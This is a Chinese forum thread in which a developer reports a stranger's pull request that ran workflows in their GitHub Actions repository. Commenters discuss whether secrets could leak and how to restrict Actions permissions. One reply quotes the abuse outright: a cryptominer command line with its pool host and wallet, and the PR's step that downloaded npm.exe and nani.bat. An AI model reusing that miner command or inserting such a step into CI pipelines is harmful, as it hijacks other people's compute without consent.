这两天发生的,之前申请了个 360 E5 的账号,用 github 的 workflow 跑 API 来续期,然后这两天发现有个家伙提了个 pr, 就是此人 https://github.com/laksjduetryuism,然后再 actions 里面看看到对方提的 pr 可以直接再工作流里面执行, https://imgur.com/xyv9435, pr 我还没有合并, https://imgur.com/bAV9nqm, 就直接生效了?如果这样可以执行不是就可以获取我再项目里面设置的 id 和 secret ... 害怕。。。
This topic created in 1867 days ago, the information mentioned may be changed or developed.
Supplement 1 Apr 12, 2021
经过老哥的提醒,已确认是挖矿: https://zhuanlan.zhihu.com/p/363729726
 | 1 just1 Apr 12, 2021 ...你的 workflow 的触发条件有 pr,不这样才奇怪呢。执行归执行除非在执行中输出了 secret,不然别人又看不到 |
 | 2 Drinker OP @just1 不知道是不是我理解错掉。如果 workflow 的触发条件有 pr,那执行的也是应该是我自己的 workflow,而不是 pr 里面的 workflow,他提过来的 pr 里面是一个 workflow 的 yml 定义文件,假设他再 yml 里面使用 curl 发送一个附带了 环境变量 ID_LIST 和 KEY_LIST 到他的服务器上,那不是就被盗了 id 和 secret ... |
 | 3 InternetExplorer Apr 12, 2021 开源项目也没什么问题吧 |
 | 4 2wex Apr 12, 2021 PR 触发的 action 不能获取 secret 放心,只要你遵守 github actions 的规矩,它还是很安全的 |
 | 5 coolcoffee Apr 12, 2021 Pull Request Trigger 执行的你项目分支的,所以就算别人提交触发了你原有流程,也不会造成什么太大影响。secret 就算被误输出也会被打码掉。 |
 | 6 baobao1270 Apr 12, 2021 via Android 好像听说最近有人拿 action 挖矿的,专门找小众 repo 提 pr |
| 7 Drinker OP @InternetExplorer 已经续期了三次,项目没问题。 |
| 8 Drinker OP @2wex 如果提交的分支里面使用 curl 发送一个附带了 环境变量 ID 和 KEY 的请求到自己的服务器上不知道会不会被盗掉,等有时间我试试。 |
| 9 Drinker OP @coolcoffee 如果分支里面使用 curl 发送请求,参数是环境变量里面的 secret,不知道会不会被发出去... |
| 10 Drinker OP @baobao1270 有可能,我看 yml 里面下了一个脚本,但是是再 win 上跑的,在我这没跑起来。 |
 | 11 learningman Apr 12, 2021 via Android @Drinker 你没看懂人家在说什么吗。。。环境变量里根本就不会有 secret |
 | 12 dingwen07 Apr 12, 2021 via iPhone 触发器不包括 pr 应该就可以吧 顺便这个用户感觉很可疑,可能是滥用用户,准备报告一下 楼主的自动跑 API 的 yaml 能否分享一下 |
| 13 coolcoffee Apr 12, 2021 @Drinker 只要你别把代码合并到你的 GitHub 仓库里面,它做仓库代码上的 action 就不可能在你的仓库上执行。 PR trigger 很常见的,像开源项目提交前会做好多规则检查。全部绿色通过以后才可以继续合并。 |
 | 14 otakustay Apr 12, 2021 workflow 触发条件是 PR 就是用来验证 PR 是否合格能否合并的,只触发你自己 PR 还有啥用 |
| 15 Drinker OP |
| 16 Drinker OP @learningman 我可能没搞清楚,因为看到这个 ``` env: ID_LIST: ${{ secrets.ID_LIST }} # secrets_id 提供 KEY_LIST: ${{ secrets.KEY_LIST }} # secrets_key 提供 ID_LIST2: ${{ secrets.ID_LIST2 }} # secrets_id 提供 KEY_LIST2: ${{ secrets.KEY_LIST2 }} # secrets_key 提供 run: | echo $ID_LIST > idlist.txt echo $KEY_LIST > keylist.txt ``` 所以很奇怪。 |
| 17 Drinker OP @coolcoffee 我没有合并 pr,但是的确在我的 aciton 里面有执行的情况,只不过 window 的 yml 无法执行,所以没有成功。 相同的受害者 https://github.com/hjdd777/AutoApiS/actions 。这个人和我一样,也被提交了 pr |
| 18 Drinker OP @otakustay 那是不是说有可能出现上面我说的那种情况,能获取得到我设置的 id 和 secret 。上面有个老哥说不行,我也不清楚。因为触发 api 的 yml 文件里面是获取了 id 和 secret 才触发的 api 。 |
 | 19 protonme Apr 12, 2021 via iPhone 可以看看 repo 设置中 Actions - Actions permissions |
 | 20 Trim21 Apr 12, 2021 via Android …他读不到你的 secrets |
 | 21 mangoDB Apr 12, 2021 |
 | 22 laoyur Apr 12, 2021 哈哈,挖矿挖到楼主头上了,笑出声 |
| 25 Drinker OP @mangoDB 就是这个.... npm.exe --algorithm argon2id_chukwa2 --pool turtlecoin.herominers.com:10380 --wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP --password xo yml 文件里面就是下载 npm.exe 和 nani.bat 。 |
 | 27 patrickyoung Apr 12, 2021 via iPhone 这个 bug 已经有人在 src 交了,现在是有设置的,自己去设置里设只允许本地就行 |
| 28 Drinker OP @patrickyoung 谢谢,已经给官方处理了。 |
 | 29 raaaaaar Apr 13, 2021 via Android 自由就是被这群人加了限制。。 |
Select Language